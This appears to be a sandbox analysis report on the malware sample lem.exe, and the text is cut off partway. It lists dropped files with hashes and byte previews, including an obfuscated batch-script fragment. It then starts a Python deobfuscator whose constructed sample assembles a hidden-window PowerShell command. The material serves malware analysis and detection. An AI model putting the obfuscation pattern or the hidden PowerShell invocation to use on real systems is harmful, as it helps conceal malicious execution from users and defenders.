                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):6.644098830563785
                                                                        Encrypted:false
                                                                        SSDEEP:192:f0HbCNULZhogkx5SgM/L5ORg3BLjtHroiH0uRAFb9gOWZb6njvI8SxvG7boQNsHb:fkXRK5S7njBH0ZngxvkubnOaRCY
                                                                        MD5:1847C2E6AFD6CD4511A3C7DD95956B87
                                                                        SHA1:A81FCC1110C17E38DAE6AEBEA798E104D270BD26
                                                                        SHA-256:F8D6C90704462ADDD02518D5D8D083456F9484370A40DEF5697317F191B74399
                                                                        SHA-512:C64C170A7E15D61F4AD5B596AADB91B82ADEB08BE6FA073B0AD2D289CBBF4BA15FEEDBFB1B2B017462E83F6250BB404F890CAB6B65CBB75CF6223B3D87D72543
                                                                        Malicious:false
                                                                        Preview:].....3.......E..}.B.}..U.t.G.M......M..m..E..E...........M..]..E.u.u.j..]....}.[t.f..f..f.E..u...f.E.....f;.w.............u@.E...u4.E..]...u f.E.......].f;.u.f.M.G..f@f.E...@.E..M...@.E.M......f;.s f.E..}.f.E..E.E.u..M.U.f.}..!3.f9E....H%..........E...u..U.u..}..E..........M....U.u..E..?.....f;.......A.]..M...E..3..]........].}......#.].#.E............}.f;...@....E.f;E...3...f;}...)...f;}.w..]..2...f..u G.E......}.u...u...u.3.f.E......f..u.G.E......}.u..}..u..}..t...M.j..U.X....~X.}..E.<W.E..}..........A..]..<.;.r.;.s.3.@...E..y...t.f...}..E........}.N.E......U..E....BH.U..E......}..u.......f.........]..]...x,.E................E........]......u.f....]..U.j.[f..~[f.M.....f;.w....................E..........E..].........f.E.......].f;.u|.....Gf.E..|.U.......f..y...........E..}..}..E..t.G.]....................M..].U.u.j....u..}.[..M...3.f..@f..f.M..U..<...f@f.E...@.E..u...@.E.....f;.s f.E..}.f.E..E.E.u.U.u.f.}...3.f9E....H%..........E....E...M..E..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):175
                                                                        Entropy (8bit):4.468423615142461
                                                                        Encrypted:false
                                                                        SSDEEP:3:RywEsV6i9lWUqt/vllpfrYZcFTS9gXeF+X32ZpAo3P8Gn:R4sV6i9HqjvVg3F+X32l/8G
                                                                        MD5:98163F9B1635664A49E5202D477E9F93
                                                                        SHA1:6A518B4FB02672762F0F773F0A79971EAFEE129E
                                                                        SHA-256:A8F6B1F27110519663B2CE7F918F64F43884A6619700621445BA3723D7B965B4
                                                                        SHA-512:1981CE403CD8BE44BA0D9D174316FC93C2935F07698B71C0A8EAE15A830920A790C6B083C88779AEECD6294BC9D15D839D223802F3D45ED8411A81277BFD00B6
                                                                        Malicious:false
                                                                        Preview:TrailersTractOffersVenezuela..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):10240
                                                                        Entropy (8bit):6.419193287850095
                                                                        Encrypted:false
                                                                        SSDEEP:192:Db5LNS6gCDZT5Bztld8f93tXjRwzHBkt615q/vcEeQblls0Hn30w+r:Db5LKC/B5lyxtX1wzS61I/vHhH30wW
                                                                        MD5:94384F6BC21724F7CCE78A08293A804C
                                                                        SHA1:E6CBD084645381E8A799024F450997A3D3970A0B
                                                                        SHA-256:9696688F7EE46D7A1FB80792C3929B248CCA9780782AAE863D429704639D8703
                                                                        SHA-512:857881EAE72D465D9F82871176A56F015E7D170FD206AF4B2DE8D9B305B8A99E0B0C815C12BDC1F57AE9874FA290B51804C415B32ACBB445C04DA6262743DAEE
                                                                        Malicious:false
                                                                        Preview:.5..L..H...;.......P..;...N...Q.?5...F.......................$.B.C..........P..\.I..6.|...D$@........H..`..........Q.`........p..A/......6.C..........Q.f............|...Q.f....q......D$@....c......U;...t$@.........K....L$..U..P......D$.....L$..U...L$.P.,....B...h..L..L$ .D$......U...E....E..@.....L$..8.@..D$@.LU........k...D$@.F......>.F..u....Rv...5..L..O..:....|......L$..0..U...........r.......$....h.-I..d.L...7......L..0...B....$.....h.L..S:....|...t$..u..u.......L$`...o.......I.........L$h.....}.....QPV..-......t$d.-......}..Q.43...F......z~..........z~...$.n.C.......i~..P..\.I..6.e-......S~........I~..Q.X....>~........4~..Q.^...)~.....p..)-......6..-.......~.........~..Q.C.....}.........}..Q.C.....}...6..t....:9..V..,......t$...}...@..p8..~..Q.U2...T$..F(......~...........~...$...C..F .....}..P..\.I..v .y.N .....}..Q.}....n.N .....}..Q..]...[.F .p..R,......v .@.N .....}..Q.u....5.N .....}..Q.w....".F .D$@....x}.....h8...t$@..,......T$..\}..h..L..L$ .D$.......R..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64512
                                                                        Entropy (8bit):6.63994737294836
                                                                        Encrypted:false
                                                                        SSDEEP:1536:Gjvj5PiuzNvt5DfExgYR5yiPl/UQ6JP04vDcmrIEVi:mPNGR5yiPlcQ4NvoWVi
                                                                        MD5:D0421AAFF28C59B66BBD9BCB2D7665D3
                                                                        SHA1:AA93E409B032E0BAD51D981FE9C2398A52C257EA
                                                                        SHA-256:8E50C6305AFC5D826D84A45F3770F452191C1E29C4B1A9B9F6B7D8B3FCE31C28
                                                                        SHA-512:E4C60F30EA7869A91B342653DA7BAE4F649B379EE3E63B8000EBD9F55E0E306B50F64835E72F678A5B921BD169B9319603AE79B14D4D89C401DF07D90D78B4FF
                                                                        Malicious:false
                                                                        Preview:...F.;.r.....Q.M.R.u..U..u..h.......E..h...;..........+.@.E..E..@....8.........M.......G;.v.}..E..M..L........;...M......}..C....]....t1;.s.j.Xf.............B..u=3...@f..........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2....................%................}.....g........Y...j0Y;.........R...j9Y;.v_..L..&.....UtE..c..4...j.Y....>..u..E....=......v..E...D....*....G....w... ..@......E..........9].u^.F..u..E....f;E..E.E.r5.E.f;.w*j0.......|.u.k......F....E......Yj9f;.Ys.E..........;U.~{.u...>..8......j0Yj7+.Z@.E...F.f;E.......f;...y............<..E....|..`....N....Zf;.r.j9Zf;.w...N....f;E.s.E...=....0......o...9]... ....F.....E..<t\..'tWj9Xj}Zj.[f;M.u_.N....f..tEj9[j-^f;.t.f;.t.f;E.r.f;.w.......f..u.....u.j.[f..t.f;.t.j...j.[....u.j9.E.....X...].j-Zf9V.u.......]..^..]....f;].j..].[j}Zr1f9E.w+.......?.u.k..j9........F..E....f;E..E.Xs.}..tG...f9.t?.E...9....$....N....j0Zf;.......j9Zf;.........N....f;E.s.......u..E...:........}..t..E.;.~..E...........+..H......
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:GTA1 style data (GRX), 8 bit editor graphics
                                                                        Category:dropped
                                                                        Size (bytes):9216
                                                                        Entropy (8bit):6.349863197432006
                                                                        Encrypted:false
                                                                        SSDEEP:192:5PV1Anp9RpPooYgb7xhTMxkcEVIRBKoA/ieLO9jEPp0s:5PV1E9RDr7bQxqIGoAJSts0s
                                                                        MD5:E2979780E0C920B9BF4D6C8D4A2F2795
                                                                        SHA1:EC266375F488085F768EBB57C4DFD820675EB871
                                                                        SHA-256:04BD58BA9616CC3A1D8A4CFF1ABC6D1BA6215C06269812951792D380750DA8A0
                                                                        SHA-512:646618CBD5B38C712BBC11EA073266042620F9A47B4DC68AE0EFCB30A8C6BBAAD2D479FFC8A0CAAAFB41A0EF3619D71EB844C1B17E2E8FDFEF20313D71AB4CF1
                                                                        Malicious:false
                                                                        Preview:"...Q.D$0PV.L$l.+...........D$0.L$....0.@..D$...+.PQS.L$(.1...L$...L$...V..0..j%Yf9.u..F...P..0..j%Yf9.../...V....0..j\Yf9....q...D$.;D$T.......t$.@.L$HVS.D$..+/...D$H.L$DHP..0.......i...q.....q....Et...Gt...X...q....d...q........w$.E..L$..@......j..QQ..$.t$LW.+S.....W.L$ .V3...t$.;s.......;s.|z.M..D$.P.si...L$,..$...L$`..+...L$`..6...L$D..6...D$@..u.P.a*..Y.t$<.W*..Y.D$\..u.P.H*..YW.A*..Y.L$..6.._^3.[..]...Q.ip..j.VS.L$(.=0...t...U....S.].VW.C..0....f...F.....p..C..H..i...X..E..x..v..@..H..i.....M..r+..;..K..xG..xG..+.;..?.E..@..0....f..WS.v..M..-...M..E.P.kh...M...5.._^3.[..].......+....U.........SV.L$..L$`W.)...}..G..0....f...G..^..p.....f...N......3..L$......D$.r&.G..H...h......................L$..D$........o...........QHQ.L$l.D$..).........o..S.L$h.J*.......p...L$,.V*.......8p........p.......5r...\$83..D$...I..|$ .D$$.D$<.D$(.T$...$........$.......L$x.........|$t................;.........$......$......$......$....PR..$....V.t$x.I........$........k.....$......$.....Q
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:OpenPGP Secret Key
                                                                        Category:dropped
                                                                        Size (bytes):107520
                                                                        Entropy (8bit):7.998447350591972
                                                                        Encrypted:true
                                                                        SSDEEP:3072:jV5Bbus+egRlqu9uPKp4GUatTtqJYHFduC7:x3mfBFUatTLlUC7
                                                                        MD5:48BBD312B082B9720023F8F01C53E277
                                                                        SHA1:36F60723DFC30BD7837F4F8668897AE41951CBB9
                                                                        SHA-256:57B5E786156CAFD3CCFE670DD1F6D73C755E5215AF9B06046E66C8091315F789
                                                                        SHA-512:315FCC0786CAAB40B08B0BF3E47C73AE87D56DF0B4FFF49351A33D344E404F9B2ADD0486860FA1FAC95A638406737EECE2B10F6F6C1678B77C504244B8591BF7
                                                                        Malicious:false
                                                                        Preview:.u...."..QAm..b..n.>.....#..........(.<.._.Ir..-wj;'..|"..u..R....h.-F......."..0?.qH.}..,.....t..k?I$0%.7..&qS.4!gVclT.'i..d+;.@..E....L.h......eQC.O.....D......=..:K....Og.^!...?.}]...c..l.;.....+...z.0..."..&rD.'...2:L....+.H..y...3.....e@..E&... ...Go.My..b.\.|.$NP:>....9.4.Y.{..c.JC.P..."..>]|.^...;c...O......(5...6.G.Y. pQ.......(`A01....U...(..S..r".z.xOy..Q.^.^....8.O..q<..5&..F.Y......H3,.._Wx..9I..M2[.t...qL..w>NkayXcJhE..{H...K^...Z>.J..b...T..*(.../....5..-S..X.w2.,./.a.f.?.0.jc.n.b'mh.P...@.Ap.5..>.=.R.f`...u.........f..."J\ny./.......9&#h..Z.8..@...w.C.>z.z..g!.....S.C .J.p.5.J.w..............I...+..Z.{..D./._.....NEX..2.m..._.....D.*.kh...}].Yz\mx.&.@A...._....$K.=tD.v.E0. V...a....y...u.m...ZI-...5.Q1.g....p.G.W.?s.QX.G....(N..+.XQ*.gU.l..>h....4.@.-.'......z....O..d..b~..-..0;.7.N.N);..h.7.~L*.X.YD ..;.NFx.wC...%.....F.4.n..c........2!y.?..FT2..u.U.D.....A.eH.......rP..I.a'M.e.g...~y..S}...T.th.#..=...Jn..V...._.m..
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):27648
                                                                        Entropy (8bit):6.901058017462281
                                                                        Encrypted:false
                                                                        SSDEEP:384:CSkXDylnffltltZZzz11ppz9KvLoXM4INduLbbOxiVnoXM4INduLbbOxidDQxah0:CSdK8M4INduPbOUGM4INduPbOU+aI4kB
                                                                        MD5:A908DD9A60B70D5FC683238CA024B902
                                                                        SHA1:B208E336519E64908A25BD68513452344A64FF72
                                                                        SHA-256:DA5FB20B02246A2A1C167321579D3AE997DE9D9A23E6B8D898E6446962893068
                                                                        SHA-512:DF24D066D3083CC78EBEDB15ED355FAF3C7D07A45149C39FCA8E4701FCEC9703A9C84F4E9A1DCC9B3C9B5F6394B45B315CD3E57190C64B153F41E86EEFC68DD3
                                                                        Malicious:false
                                                                        Preview:-J.0.?.6.}\0.<]%>..U.?.A..n/..X.0..y.?.c..~.<..yUk..?1......<z..k..?.l..4.....Z....?..]4..<f..)...?$.L.....O..3.?..0^.b.:Y.rY.?.m...q..G^..v..?:.T~OXu.J..0...?.)T.......K....?..-z.=.<...[...?r.k?.....R....?.HP.e..<z.._.@.?...7E.<K.W..g.?.<H.M..<....m..?D\.H..q<i... ..?.I....u<..]U...?r..S;..|..J-..?.zyC7......./.?w..q{H.......X.?.7[...<......?........2....?2.mi.#.<`...!..?...xW.<_.{3...?[K.O...)...F&.?..z.'....?...P.?......<.L..Qz.?...".<......?.(..#....g.-H..?......'Za....?......<..k7+%.?C......<@En[vP.?...-..<.....{.?.5............?....SH.<.q.+...?.ye.t.b<......8C......8C.......................?.......?................1g....U?.....k.?wN.o...?......?.9..B..?...........@G..................................................................................................fq..@.........@.6C......?.......?.exp............a.B.].C.b.C...C.................5.h!.....?.......?...........................?..5.h!....>@...............................@................c.c.s
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):10240
                                                                        Entropy (8bit):6.653168303634218
                                                                        Encrypted:false
                                                                        SSDEEP:192:EEMazNFZqTAHCTfN1BvzTK1/7jLjtWwIf5uoDwoQADgGk7ql20MLkKc93i3L3:EEMa1qTdpjvz+ZvNWvfQoEoQvGkwLMwm
                                                                        MD5:2CABD94C5E53CC162389389819BA859C
                                                                        SHA1:BB2662DEC236636A462E6347BA492B5DE68C6C49
                                                                        SHA-256:B0450F34CBD94FC1C17F8A5E3D8A55B2DD176558E6BDC89655EEDF557322019B
                                                                        SHA-512:4A32DE9EA1A96033DA46A0B65339EF46D18B5B87125F5CD4406D8CEE2CDA3B9FACD3299F9EFA379F1AC1D8B1F197AACCCFBD33A4F55F3A5BE410FDF0AB3C170C
                                                                        Malicious:false
                                                                        Preview:...I......u.2..&9].u.WS...}..Su.SW..WSV....I.V..X.I..._^[].SV....L.W........j.h.HF.V..x.I.S......_^[.U..Vh.............$....V.u...H.I.f.>.t.W...L.V.......h.;I........_V.....Y3.@^]...U......T...V..V....I....u .L$.QV....I....u.....P....I..D$.^..].U.....E.SVW....PW..p.I.....u.2.....V.1...YP.E.3.VPW.E...l.I..u.V.[...3...j.Z.........Q.......hL,I.W.....hL,I.V.|..............hX.K.W....hL,I.V.........uj.E.P.E.Phx.K..u...t.I...t,.E..O j..0Vj.Z.F...j.....O(Vj.Z.5....u......h..K.W.D...YYhL,I.W.7...VW.0........VW.$...YYh..K.V....YY..u*j..G PS.&....u.3.f.C.....W..............E.P.E.PW.u...t.I...tXhL,I.V....YY..u).E..P..H....P...Q...P...Rh.K.S.........h.....u.S.......3.f.......E...u......W......E.YY_^[..].U...........V.E...P......Ph.....1..`.I....t%......P.....u..M..~...hL,I..........+....M..#...^..].U..QS..;M.u!V.......E.P.u.SV..`.I.V.p...Y^...E.P.u.SQ..`.I..M......[..].U........h...VWPh............I.........h..........P....I.......P....I...tw.P.3.9.t...@.A.8.u.;.~.h..K.W.q.
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):50176
                                                                        Entropy (8bit):5.830919475362767
                                                                        Encrypted:false
                                                                        SSDEEP:768:qLQEGBoAyGcjXB2SCursGHv7mlHW7nIhp/lNVi6dFiwc/RGNul1Eovu86eV3QKY/:aRGDox2S3hPt8gNpkU5uG3xYwC
                                                                        MD5:1621DF8276C2401CB9232EDC0C203186
                                                                        SHA1:C30B091A82310EBFF8569FDCF7F3ED5826A8184A
                                                                        SHA-256:F726D7A85B020F63BC9D6D35333B1A90FBF71313197251B328C9BA17D70ED7AF
                                                                        SHA-512:7B245BF6FBDE87475DEB30AEE362EEFDE764D6FE7ED94232BA54624548FB1E90294766C28C175642E4A4FAA056CBED0104B5B972D7D64FFCC9BF80BD97516E6D
                                                                        Malicious:false
                                                                        Preview:(binary; non-printable bytes omitted. Contains x86 prologue/epilogue bytes (U..VW, _^]), a run of pointers rendered as .wD/.xD/.|D pairs, i.e. little-endian addresses in the 0x0044xxxx range, and ascending byte ramps (space through uppercase letters) of the kind used for index or translation tables, consistent with a slice of 32-bit code plus table data.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):28004
                                                                        Entropy (8bit):7.993258796246441
                                                                        Encrypted:true
                                                                        SSDEEP:768:3HxbUsrB0QIY1CKrUtXFDgJjdazaQuPQCAeLb0DE:3Hx56tXFojd6aQuPQCMw
                                                                        MD5:448FEDC2A81E25A6D6D0CACE5D7A98F7
                                                                        SHA1:DB6A9DDD0CCCBCA4C7811DCEE2E455A4292BA433
                                                                        SHA-256:76EA29BCB320600E55703872119912DD0135050AAA0680CA01AADC514E5F02EA
                                                                        SHA-512:9C66C61E7AADF2BF8B8D8BCAD20C50C8C24FC1E71FE02E66329F5318815404AF18E08A5CF5B034C97A12583BFFC9D2FE085A7A2819BEF9CD17490A6B82CA83E4
                                                                        Malicious:false
                                                                        Preview:(binary; high-entropy bytes with no printable structure, consistent with the Encrypted:true flag and the 7.99 entropy above; omitted here.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):58368
                                                                        Entropy (8bit):4.377576762014684
                                                                        Encrypted:false
                                                                        SSDEEP:768:n+AGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07L:n+l6JPTcUNx6/xhgariw
                                                                        MD5:EDDFB49B0A039B165EFE06E33EDF37AD
                                                                        SHA1:7E8C72B8CDB6806EF869C6BCA371B937DD3738B8
                                                                        SHA-256:E0DC90C531C6863D456FA03DBFAC4153F95C7841C898F9D8841C5A909A09DDAC
                                                                        SHA-512:B4B66592864D00448AE3E343A5676EBAD5A8FA5F6398CCF936D4CF9C24E8AE0DDA0C51D119661CE0217AA1EA8DDFEEB97B384022ACBB94DD9FB828AE6FE534F7
                                                                        Malicious:false
                                                                        Preview:(binary; the previewed first kilobyte is almost entirely one repeated non-printable byte with a short ____ run, i.e. padding or table space, matching the low entropy above; omitted here.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):47104
                                                                        Entropy (8bit):4.6373154655906985
                                                                        Encrypted:false
                                                                        SSDEEP:384:0QXoSpu88888888888888888888888888888zv888888NfU84444QnoooooooooT:Dx/SW
                                                                        MD5:80FE93BA081BCD2EC189D029501878CA
                                                                        SHA1:6F7C3C2DD53899273C87869F237F928B469E48E0
                                                                        SHA-256:995D1B705D45492BD720B1DBE3F74D37F6E0D700B65B28FEBB13BB3FA3F96DAA
                                                                        SHA-512:E5C3CC83AFDFEFA1D1ED81D08767E5D37860CCC7CA98633BFD76E958E016D7F911E554F32AF4D747F98EA33AA8E235359711FCF3564C0AE2B00D9CBCD76BDE59
                                                                        Malicious:false
                                                                        Preview:(binary; a regular alternation of one non-printable byte with an ASCII letter in the g..~ range, i.e. 16-bit table entries in a narrow value range; low-entropy table data, omitted here.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):62464
                                                                        Entropy (8bit):6.532990002417595
                                                                        Encrypted:false
                                                                        SSDEEP:1536:phPc5pLW5N1c+d9YUtq5YdzhtD4RLGki26nWRgRPaM+:ph8p65Nu+dVtqi/x4Rqf21RgaN
                                                                        MD5:77BA11AF3B0AC1E81A97C07CD6AF2F81
                                                                        SHA1:3CB0307E64AD3C95BFA6C557E7D9F578E4715E70
                                                                        SHA-256:BB24D79DB3FD448CCA16C1DB1FD30E97B2EB4013719E7234B4EB1B028DB76172
                                                                        SHA-512:CB995B1137070B1243429208C4A19F4517A9DC396C06C572239A4E2B24C85CBD55B2BEF559961B25C0443FB3C2455DE3B2E1588FD388A6A7B61812A1938B3203
                                                                        Malicious:false
                                                                        Preview:(binary; non-printable bytes omitted. Contains x86 prologue/epilogue bytes (U..V, _^..], _^[]) and push-immediate sequences (j. = 0x6A imm8), consistent with a slice of 32-bit code.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):86016
                                                                        Entropy (8bit):7.997967698346819
                                                                        Encrypted:true
                                                                        SSDEEP:1536:ZF/2Zb58naQOect9dKgJfOEtmIcPcDOSnPnKXAMuPt6iziT7qg4AbsV2wn60ptiy:/eZ18naQOecxKA2EtmFPchP1tkT7nbs1
                                                                        MD5:6C691518457F3209EEC799C6F9671AEF
                                                                        SHA1:C75D7327295B5E4483E3177A7A605009D97ECDD5
                                                                        SHA-256:DF32A06032474CB11913B8CE9B94CF26CA6F2CAA6397A0FBFE83342E6E1EF150
                                                                        SHA-512:BE761CE05CB72B7191C55725B6529AD667BA25164C06004398104D4261D2C0E5712EFCD65CA5441DC753AE8855469DABCF11AAB93CB15F83C6C13C0FCE58093B
                                                                        Malicious:false
                                                                        Preview:(binary; high-entropy bytes with no printable structure, consistent with the Encrypted:true flag and the 7.998 entropy above; omitted here.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):105472
                                                                        Entropy (8bit):7.998372853281664
                                                                        Encrypted:true
                                                                        SSDEEP:1536:r4FKJB620g24UpULrX9sEUf6dXCMwOSUx6QLl3GPhimmooLs7ioPUNeinbZcpkss:r4Ezt0ibLrSpkiWx3IhiKogwn9cxH1m
                                                                        MD5:A351EA814B97D581B6F6DF357899A8A1
                                                                        SHA1:0F054F7B2E965DB4B0603CCAB99EB560D82A2CDA
                                                                        SHA-256:8F7C5E402D4D76C19C42B46F0DEBCFDD99C6B2403C4284218EF39A14C042BDC9
                                                                        SHA-512:8A1A3ADC0CDE5EB39DF0B94C015C93EB605BA1074A8214EBE9C39D10FA1AD59F38B0B0F021F2534E88C29A3923218262B765D9729BCF400907E329E2F2B66A0B
                                                                        Malicious:false
                                                                        Preview:(binary; high-entropy bytes with no printable structure, consistent with the Encrypted:true flag and the 7.998 entropy above; omitted here.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):17408
                                                                        Entropy (8bit):4.644200516744838
                                                                        Encrypted:false
                                                                        SSDEEP:192:hHhOmbnnnnn6EkGwuvCbCC99qpF9DAgFKPS/gkh888888SS8888888888888888D:hBcEZbvlF2c/mwft7
                                                                        MD5:AD520F194518A11C7447187B8619FD04
                                                                        SHA1:51DEE54B1AC28CB2D388707B6FB032E88638B1B2
                                                                        SHA-256:3471829A3C70D0871A10543BBE7BECF3E5EABA32BBC274DA9F2325BF0B3A7DF3
                                                                        SHA-512:3BC1C286641B03272048AD77E236D985D7AE42A754ECD46A04D67C926C1AC916FBDF54D91F7EAE47E23F902BA9F0E5CCAD40B952988CB3AB229049E43C955D12
                                                                        Malicious:false
                                                                        Preview:(binary; non-printable bytes omitted. Contains ASCII case-mapping tables: the run ' !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~' maps A..Z onto a..z (a tolower table) and the following run, which has ABCDEFGHIJKLMNOPQRSTUVWXYZ in the lower-case slots, is the matching toupper table, as embedded by C runtimes; consistent with a slice of a compiled binary's data section.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):6.469008351623293
                                                                        Encrypted:false
                                                                        SSDEEP:384:vrfCcU0oSMFHEQs4NyYLYeQVuMt2FoLglQRrJZC8w4WxqlVGQl3DPCyR:vjrUTSu7YeQ0p4pZP40VLhDPC+
                                                                        MD5:739EA96042FC7CD86384BA367A9279BD
                                                                        SHA1:79D5A3C1CA8A3A15D6E98DA095B6B6A64A18EDCA
                                                                        SHA-256:DF5E4A5572729CD7D99C2D4575D2DC97515D4E2AB07F5B2BFFC49650DE0A8A3D
                                                                        SHA-512:9750A92FEB02A7DEA2881E9B15177578EE2115283E0314F174DADB7BA9DC56E101B95560E3F451D681F8908292EF0D7DB54E6221A264D9D1E140E360FF639997
                                                                        Malicious:false
                                                                        Preview:(binary; non-printable bytes omitted. Contains x86-style sequences such as Pj{ and Pj| (push eax; push imm8), consistent with a slice of 32-bit code.)
                                                                        Process:C:\Users\user\Desktop\lem.exe
                                                                        File Type:ASCII text, with very long lines (794), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13274
                                                                        Entropy (8bit):5.052407282928475
                                                                        Encrypted:false
                                                                        SSDEEP:384:LhU1m2ba7+CG/72va+HHb1GvpCMuECB7GvAd3:dULEGqy+GpxLCB6vm
                                                                        MD5:6E17C40514125AF32038C0515E080676
                                                                        SHA1:85FA858D2A5CF7F1036278F5DDB75EB4E6740FAF
                                                                        SHA-256:B8F7BFD9621C81F65F9194D7F1CB2C3E91716C0478385380FB3CB219937AF8E3
                                                                        SHA-512:FDB0278B2428454B7617972022865C68BCD64198F44B9CB6105320B34849963667F24C0629CF2A2F0E9D789E281BDE9A82B5D7BB8DCD1DF348DD973003888FB3
                                                                        Malicious:false
                                                                        Preview:Set Kind=T..ZNExpressions Scripts Acquisitions Og Pathology ..yALifetime Mba Rich Puerto Monaco Tide Turning Professionals Shall ..OlsCSecretary Binary Investing Longer Tumor Trace Appreciate Sentences Brief ..mgNXVolkswagen ..ICdEnvironments Copy Chain Holdem Mic Possession Docs Examinations ..sZhqMeal Pvc Mounted Much Acceptable Involvement Rescue Pays ..tGoNRaid Formation Marie Scan Cp Brand Jvc ..Set Temp=z..ajJosh Can Leu Lately Agreed Rep Burner Lobby ..RtString Capability Petersburg Fire Audience ..xWCFSecurities Coral Amenities Ties Fee Pierce ..nkODocumentary Linda Fires Morocco Notebook Holidays Orgasm ..nBDegrees Format Which Sole Malawi ..dYDelays Teddy Legislature ..Set Quiz=O..ROSSSubaru Ru Clearance Suffering ..ZmWater Energy ..utWatched Pn Triple ..uioIraqi Indonesian Gilbert ..GgMorocco Stanford Fioricet Oh Commentary North ..lyJRj Buyer Abuse Abc Tone ..Set Reviewer=B..ddVRecovery Puts Components ..fLnFtp Continental ..xbZTour Rating Lawrence Jill Shopper ..EzejManufa
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:ASCII text, with very long lines (794), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13274
                                                                        Entropy (8bit):5.052407282928475
                                                                        Encrypted:false
                                                                        SSDEEP:384:LhU1m2ba7+CG/72va+HHb1GvpCMuECB7GvAd3:dULEGqy+GpxLCB6vm
                                                                        MD5:6E17C40514125AF32038C0515E080676
                                                                        SHA1:85FA858D2A5CF7F1036278F5DDB75EB4E6740FAF
                                                                        SHA-256:B8F7BFD9621C81F65F9194D7F1CB2C3E91716C0478385380FB3CB219937AF8E3
                                                                        SHA-512:FDB0278B2428454B7617972022865C68BCD64198F44B9CB6105320B34849963667F24C0629CF2A2F0E9D789E281BDE9A82B5D7BB8DCD1DF348DD973003888FB3
                                                                        Malicious:false
                                                                        Preview:Set Kind=T..ZNExpressions Scripts Acquisitions Og Pathology ..yALifetime Mba Rich Puerto Monaco Tide Turning Professionals Shall ..OlsCSecretary Binary Investing Longer Tumor Trace Appreciate Sentences Brief ..mgNXVolkswagen ..ICdEnvironments Copy Chain Holdem Mic Possession Docs Examinations ..sZhqMeal Pvc Mounted Much Acceptable Involvement Rescue Pays ..tGoNRaid Formation Marie Scan Cp Brand Jvc ..Set Temp=z..ajJosh Can Leu Lately Agreed Rep Burner Lobby ..RtString Capability Petersburg Fire Audience ..xWCFSecurities Coral Amenities Ties Fee Pierce ..nkODocumentary Linda Fires Morocco Notebook Holidays Orgasm ..nBDegrees Format Which Sole Malawi ..dYDelays Teddy Legislature ..Set Quiz=O..ROSSSubaru Ru Clearance Suffering ..ZmWater Energy ..utWatched Pn Triple ..uioIraqi Indonesian Gilbert ..GgMorocco Stanford Fioricet Oh Commentary North ..lyJRj Buyer Abuse Abc Tone ..Set Reviewer=B..ddVRecovery Puts Components ..fLnFtp Continental ..xbZTour Rating Lawrence Jill Shopper ..EzejManufa
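The dropped script above (the same file, by hash, is recorded once as written by lem.exe and once as observed from cmd.exe) shows single-character Set statements (Set Kind=T, Set Temp=z, Set Quiz=O, Set Reviewer=B) interleaved with lines of junk words, the layout of a batch file that stores its real command as one-character variables and reassembles it later through %VAR% references. Only the first kilobyte of the file is previewed, so what it assembles is not on this page. The following is an added example, not code from the report or from the sample, that extracts such assignments and expands the references in the remaining lines, including cmd's %VAR:~start,len% substring form; SAMPLE_BATCH is a constructed script with the same layout.

```python
"""Added example, not code from the report or from the sample: recover the
command assembled by a batch file that splits it across `Set NAME=value`
assignments padded with junk lines, the pattern visible in the dropped
script above.  SAMPLE_BATCH is constructed for this example; the real file's
later content is not shown on the page."""
import re

# `set NAME=value` or `set "NAME=value"`, case-insensitive (cmd variable names are).
SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=([^"\r\n]*)"?\s*$', re.IGNORECASE)
# %NAME%, %NAME:~start% or %NAME:~start,len% (cmd substring syntax, negatives allowed).
REF_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%')
MAX_ROUNDS = 16   # stop expanding nested references after this many passes

SAMPLE_BATCH = "\r\n".join([
    "@echo off",
    "Set Kind=p",
    "ZNExpressions Scripts Acquisitions Og Pathology ",
    "Set Temp=ow",
    "ajJosh Can Leu Lately Agreed Rep Burner Lobby ",
    'set "Quiz=ersh"',
    "utWatched Pn Triple ",
    "Set Reviewer=ell",
    'set "Flag=xx-w hiddenxx"',
    "set Cmd=%Kind%%Temp%",
    "%Cmd%%Quiz%%Reviewer% %Flag:~2,-2% -c whoami",
])


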